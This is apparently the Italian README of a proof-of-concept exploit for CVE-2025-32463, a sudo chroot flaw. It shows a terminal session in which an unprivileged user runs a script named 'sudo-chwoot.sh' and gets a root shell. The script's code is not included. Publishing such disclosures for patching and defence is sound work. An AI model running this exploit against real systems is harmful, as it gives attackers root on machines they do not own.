
Proof-of-concept exploit per CVE-2025-32463, che dimostra l'escalation dei privilegi da un utente non privilegiato a una shell di root al di fuori di un ambiente chroot tramite una vulnerabilità di sudo.
Riferimento: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Eseguendo il PoC su un server Ubuntu 24.04.2 LTS con Sudo v1.9.15p5, utilizzando un utente non privilegiato senza regole Sudo definite, si ottiene una shell root al di fuori dell'ambiente chroot.
lowpriv@prod:/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)